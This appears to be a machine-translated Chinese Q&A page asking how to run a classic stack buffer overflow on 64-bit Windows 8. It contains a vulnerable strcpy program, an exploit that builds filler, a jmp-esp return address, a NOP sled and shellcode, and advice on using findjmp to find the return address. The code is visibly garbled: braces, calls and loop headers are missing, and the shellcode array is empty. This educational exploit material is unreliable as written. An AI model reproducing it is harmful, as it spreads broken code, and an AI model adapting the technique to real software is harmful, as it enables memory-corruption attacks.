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Windows 8中的“簡單”緩沖區溢出

[英]“Simple” buffer overflow in Windows 8


  1. 第一個接受輸入並將其復制到內存中
  2. 第二個濫用第一個,以執行一些在Windows 8上顯示文本框的shellcode。

我找到了一個舊的教程 ,該教程為您提供了兩個程序來做類似的事情,但是要使其在64位Windows 8下運行卻有些困難。 我正在使用Visual Studio 2013編譯代碼。


#include <stdio.h>
#include <stdlib.h>

int foo(char *);

int main(int argc, char *argv[])
  if(argc != 2)
    return printf("Supply an argument, dude\n");
  return 0;

int foo(char *input)
  unsigned char buffer[600]="";
  printf("%.8X\n", &buffer);
  strcpy(buffer, input);
  return 0;


#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#define RET 0x7935EDBB   /* ATTENTION!!! Change it. Search kernel32.dll
                           or any other library for jmp esp or call esp 
                           instruction and then save the address */
#define TRASH 0x41

char shellcode[]=

int main(int argc, char *argv[])
  char *bufExe[3];
  char buf[700];
  int i;
  char *ptr = buf;

  memset(buf, 0, sizeof(buf));
  bufExe[0] = "vuln.exe";
  bufExe[2] = NULL;

    (*ptr++) = TRASH;                     //620 bytes of chunk

  *(unsigned long *)&buf[620] = RET;   //then return address = jmp esp, call esp
  strcat(buf, "\x90\x90\x90\x90");     //small NOP sledge
  strcat(buf, shellcode);              //and our first shellcode
  bufExe[1] = buf;
  return 0;

我認為絕對需要更改的兩件事是: #define RET 0x7935EDBB ,也許還有shellcode。


似乎RET地址可能不正確。 要找到正確的RET地址,請使用findjmp (來自Ryan Permeh)。 編譯findjmp.c並使用以下參數運行:

findjmp <DLLfile> <register>.  Suppose you want to look for jumps to esp in kernel32.dll, run  “findjmp kernel32.dll esp”
On Vista SP2, you should get something like this :
Findjmp, Eeye, I2S-LaB
Findjmp2, Hat-Squad
Scanning kernel32.dll for code useable with the esp register
0x773AF74B      call esp
Finished Scanning kernel32.dll for code useable with the esp register
Found 1 usable addresses


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